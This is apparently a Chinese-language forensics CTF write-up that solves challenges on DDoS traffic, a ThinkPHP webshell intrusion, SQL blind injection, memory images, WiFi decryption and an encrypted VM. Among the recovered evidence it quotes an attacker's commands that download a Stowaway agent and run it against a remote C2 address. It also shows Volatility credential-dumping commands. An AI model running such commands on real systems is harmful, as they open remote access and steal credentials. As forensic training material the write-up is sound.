签到题

通过分析抓包文件，观察到大量HTTP异常请求。深入TCP层后发现更多传输层错误，判断为针对应用层的分布式拒绝服务攻击，攻击协议为http。

JWT认证分析

该站点采用jwt认证机制。从流量文件goroot.pcap中追踪HTTP流，检索username字段定位登录请求，在响应报文中提取认证令牌。利用在线解析工具解码后，获取到用户标识信息。

进一步分析流量，发现命令执行接口为/exec，其返回内容显示当前系统权限为root。攻击者向/tmp/1.c写入恶意代码，随后编译生成名为Looter.so的动态链接库文件。此外，攻击者还篡改了/etc/pam.d/common-auth认证配置文件。

WebShell入侵溯源

从POST请求中定位登录接口，提取到凭据为test:Admin123!@#。攻击者利用ThinkPHP模板注入漏洞，篡改日志文件路径为data/Runtime/Logs/Home/21_08_07.log。

成功植入WebShell后，服务运行身份为www-data，写入的木马文件名为1.php。攻击者部署了frpc代理工具，通过分析frpc.ini配置前的传输流量，经十六进制解码后获取回连服务端地址。

日志深度挖掘

筛选状态码200的访问记录，发现源码备份文件www.zip。进一步追踪发现攻击者向/tmp目录写入sess_car文件，经反序列化内容解析，确认使用SplFileObject类读取敏感数据。

内存镜像取证

使用Volatility框架进行分析：

# 识别镜像信息
volatility -f Target1.vmem imageinfo

# 提取用户哈希
volatility -f Target1.vmem --profile=Win7SP1x64 hashdump

# 获取LSA凭据
volatility -f Target1.vmem --profile=Win7SP1x64 lsadump

通过filescan定位关键文件后，提取加密备份文件。结合提示信息构造解密口令，利用开源工具还原华为加密备份，最终从图片资源中获取关键字符串。

日志分析与SQL注入

分析攻击载荷参数，经解码后获取目标文件绝对路径。对编码字段进行URL解码与Base64还原，提取出反弹Shell的远程地址。

注入手法判定为布尔盲注，最终提取的数据库结构为Sqli#flag#flag。通过分析%C2%80分隔符定位匹配成功的字符位，逐位还原出完整flag。

iOS设备取证

追踪TCP流发现攻击者执行了远程命令：

wget https://github.com/ph4ntonn/Stowaway/releases/download/1.6.2/ios_agent
chmod 755 ios_agent
./ios_agent -c 3.128.156.159:8081 -s hack4sec

由此确认C&C服务器地址、利用的开源项目及通信密钥。通过SSL密钥日志解密流量，还原SQL盲注获取的敏感数据。过滤源地址192.168.1.8的流量，确认端口扫描范围为10-499。

WiFi流量解密

从服务端流量中识别出哥斯拉木马特征，提取加密密钥。客户端流量包含SSID信息，需结合内存镜像分析。

从Windows内存镜像中恢复历史命令记录，定位导出的压缩文件。通过网卡GUID信息解压，获取包含AES密钥的XML配置文件。利用airdecap-ng工具解密WPA2流量后，追踪到文件上传操作及WebShell交互过程。

加密虚拟机破解

面对加密虚拟机文件组，首先识别文件类型：Encryption.bin01为挂起状态文件，Encryption.bin02包含vmx配置与vmdk磁盘信息。

修复vmx配置时，补充编码格式、显示名称及加密密钥字段，注意将加密算法调整为AES-256。使用字典爆破工具获取虚拟机密码1q2w3e4r。

重建vmdk文件时，新建同配置虚拟机并加密，提取其磁盘头部加密串替换至目标文件，确保磁盘信息正常加载。

移除加密后获得原始内存镜像，使用Volatility3识别系统版本为Windows 10 18362。通过注册表查询获取系统版本号、主机名及用户列表，计算指定组合的MD5值。

利用malfind模块检测代码注入，结合网络连接分析定位恶意进程。通过userassist注册表分析运行痕迹，发现痕迹清理工具的执行记录，提取时间戳计算最终答案。